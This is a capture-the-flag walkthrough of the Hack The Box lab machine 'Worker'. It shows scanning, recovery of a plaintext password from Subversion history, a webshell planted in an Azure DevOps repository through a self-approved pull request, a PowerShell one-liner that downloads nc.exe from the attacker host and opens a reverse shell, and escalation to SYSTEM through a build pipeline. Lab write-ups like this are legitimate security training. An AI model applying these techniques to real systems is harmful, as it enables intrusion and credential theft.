This post documents the complete walkthrough of Worker, a retired vulnerable VM created by ekenas, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Worker is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.203 --rate=500
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-08-17 05:22:28 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.203
Discovered open port 5985/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Nothing unusual stood out. Let’s do one better with nmap scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p80,3690,5985 -A --reason 10.10.10.203 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve syn-ack ttl 127 Subversion
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Interesting. Looks like we have a Windows machine. This is what the http
service looks like.
What a shit-show.
Subversion
Since Subversion is available, let’s use the nifty svn
client to see what we can find.
# svn log -v svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 13:52:00 +0000 (Sat, 20 Jun 2020) | 1 line
Changed paths:
A /moved.txt
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 13:50:20 +0000 (Sat, 20 Jun 2020) | 1 line
Changed paths:
D /deploy.ps1
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 13:46:19 +0000 (Sat, 20 Jun 2020) | 1 line
Changed paths:
M /deploy.ps1
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 13:45:16 +0000 (Sat, 20 Jun 2020) | 1 line
Changed paths:
A /deploy.ps1
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 13:43:43 +0000 (Sat, 20 Jun 2020) | 1 line
Changed paths:
A /dimension.worker.htb
A /dimension.worker.htb/LICENSE.txt
A /dimension.worker.htb/README.txt
A /dimension.worker.htb/assets
A /dimension.worker.htb/assets/css
A /dimension.worker.htb/assets/css/fontawesome-all.min.css
A /dimension.worker.htb/assets/css/main.css
A /dimension.worker.htb/assets/css/noscript.css
A /dimension.worker.htb/assets/js
A /dimension.worker.htb/assets/js/breakpoints.min.js
A /dimension.worker.htb/assets/js/browser.min.js
A /dimension.worker.htb/assets/js/jquery.min.js
A /dimension.worker.htb/assets/js/main.js
A /dimension.worker.htb/assets/js/util.js
A /dimension.worker.htb/assets/sass
A /dimension.worker.htb/assets/sass/base
A /dimension.worker.htb/assets/sass/base/_page.scss
A /dimension.worker.htb/assets/sass/base/_reset.scss
A /dimension.worker.htb/assets/sass/base/_typography.scss
A /dimension.worker.htb/assets/sass/components
A /dimension.worker.htb/assets/sass/components/_actions.scss
A /dimension.worker.htb/assets/sass/components/_box.scss
A /dimension.worker.htb/assets/sass/components/_button.scss
A /dimension.worker.htb/assets/sass/components/_form.scss
A /dimension.worker.htb/assets/sass/components/_icon.scss
A /dimension.worker.htb/assets/sass/components/_icons.scss
A /dimension.worker.htb/assets/sass/components/_image.scss
A /dimension.worker.htb/assets/sass/components/_list.scss
A /dimension.worker.htb/assets/sass/components/_table.scss
A /dimension.worker.htb/assets/sass/layout
A /dimension.worker.htb/assets/sass/layout/_bg.scss
A /dimension.worker.htb/assets/sass/layout/_footer.scss
A /dimension.worker.htb/assets/sass/layout/_header.scss
A /dimension.worker.htb/assets/sass/layout/_main.scss
A /dimension.worker.htb/assets/sass/layout/_wrapper.scss
A /dimension.worker.htb/assets/sass/libs
A /dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A /dimension.worker.htb/assets/sass/libs/_functions.scss
A /dimension.worker.htb/assets/sass/libs/_mixins.scss
A /dimension.worker.htb/assets/sass/libs/_vars.scss
A /dimension.worker.htb/assets/sass/libs/_vendor.scss
A /dimension.worker.htb/assets/sass/main.scss
A /dimension.worker.htb/assets/sass/noscript.scss
A /dimension.worker.htb/assets/webfonts
A /dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A /dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A /dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A /dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A /dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A /dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A /dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A /dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A /dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A /dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A /dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A /dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A /dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A /dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A /dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A /dimension.worker.htb/images
A /dimension.worker.htb/images/bg.jpg
A /dimension.worker.htb/images/overlay.png
A /dimension.worker.htb/images/pic01.jpg
A /dimension.worker.htb/images/pic02.jpg
A /dimension.worker.htb/images/pic03.jpg
A /dimension.worker.htb/index.html
First version
------------------------------------------------------------------------
I wonder what’s in deploy.ps1
revision 2?
# svn cat svn://10.10.10.203/[email protected]
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
What about moved.txt
?
# svn cat svn://10.10.10.203/moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
Azure DevOps
The credentials (nathen:wendel98
) work for devops.worker.htb
.
Mapping repos to virtual hosts
There are many repositories under the SmartHotel360 project. I wonder where have I seen dimension
before?
Right. It was mentioned that dimension.worker.htb
was moved to devops.worker.htb
. Putting two and two together, each repository must correspond to a virtual host.
Bingo! I later discovered this in http://dimension.worker.htb/#work
.
Dropping ASPX webshell
Let’s see if we can drop a ASPX webshell into one of the repos. After some trial-and-error, the way to do it is via pull request. Long story short, we have to add the webshell to a temporary branch, and after review (by yourself ) and approval, create a pull request to merge the temporary branch to the
master
branch.
There’s a small caveat. The repo will revert itself to its original state after a short while (I don’t know, like every five minutes?). Essentially you only have a short window of opportunity to get a reverse shell.
Commit to a new branch
Add a reviewer
Review and approve the pull request
Complete the pull request
And we have remote command execution!
Remember our window of opportunity is short. Prepare the following command to transfer nc.exe
to C:\Windows\Temp
(default writeable folder) and launch a reverse shell immediately.
powershell /c iwr http://10.10.14.42/nc.exe -outf \windows\temp\cute.exe && start \windows\temp\cute.exe 10.10.14.42 1234 -e cmd.exe
Foothold
Sweet.
Getting user.txt
During enumeration of this account, I found the W: drive and W:\svnrepos\www\conf\passwd
.
Incidentally, robisl
is listed in C:\Users
and is a member of the local group Remote Management Users, which means that I can log in remotely via WinRM, i.e. Evil-WinRM.
No surprise, the file user.txt
is at robisl
’s Desktop.
Privilege Escalation
Besides being a member in the Remote Management Users group, robisl
is also a member of the Production group. This means robisl
is able to log in to devops.worker.htb
.
More importanly, robisl
is able to build!
Launching a reverse shell from the build pipeline
Azure DevOps provisions for the execution of scripts during the build process: be it command line scripts or Powershell commands. Let’s go through that process.
Creating a build pipeline
Click on the blue button to create a new pipeline.
Azure Repos Git (YAML)
Select Azure Repos Git.
Select the repository
Select the one and only repository.
Configure your pipeline
Select ASP.NET Core.
Review your pipeline
That’s it. We’re going to leverage on the nc.exe
(renamed as cute.exe
) that’s already in C:\Windows\Temp
.
Save and run
For some reason, we’ve to use pull request instead of committing directly to the master
branch.
Save and run.
Getting root.txt
A shell appears in my nc
listener!
Getting root.txt
with NT AUTHORITY\SYSTEM is a breeze.